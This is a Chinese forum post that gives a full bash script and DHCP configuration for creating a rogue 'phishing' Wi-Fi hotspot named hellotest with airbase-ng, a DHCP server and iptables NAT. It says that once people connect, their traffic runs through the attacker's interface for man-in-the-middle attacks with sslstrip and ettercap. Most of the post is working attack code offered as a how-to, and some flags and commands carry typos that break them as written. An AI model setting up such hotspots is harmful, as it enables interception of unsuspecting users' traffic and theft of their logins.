本帖最后由 90_ 于 2016-3-6 13:19 编辑
具体的技术细节记录一下,具体的shell脚本如下:
[AppleScript] 纯文本查看 复制代码 #! /bin/bash
case $1 in
“start”)
sleep 1
ifconfig wlan2 down
sleep 1
iwconfig wlan2 mode monitor
sleep 1
ifconfig wlan2 up
sleep 2
airmon-ng start wlan2
sleep 1
airbase-ng -e hellotest -c 11 wlan2
sleep 1
;;
“atup”)
sleep 1
ifconfig at0 up
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
sleep 1
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
sleep 1
echo “1” >/proc/sys/net/ipv4/ip_forward
sleep 2
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
service isc-dhcp-server start
sleep 1
;;
“startnat”)
sleep 1
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
sleep 1
iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
sleep 1
iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356
sleep 2
;;*)
echo “Usage $0 {start|atup|startnat}”
;;
esac
将以上shell脚本保存为cr_wifi.sh,然后依次执行:
./cr_wifi.sh start
./cr_wifi atup
./cr_wifi startnat
执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。
以上shell脚本主要有三个部分:
1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;
2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;
3,添加iptables规则,配置NAT。
执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:
[AppleScript] 纯文本查看 复制代码 ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.1 10.0.0.25;
option domain-name-servers 114.114.114.114;
# option domain-name internal.example.org;
option routers 10.0.0.1;
option broadcast-address 10.0.0.250;
default-lease-time 600;
max-lease-time 7200;
} |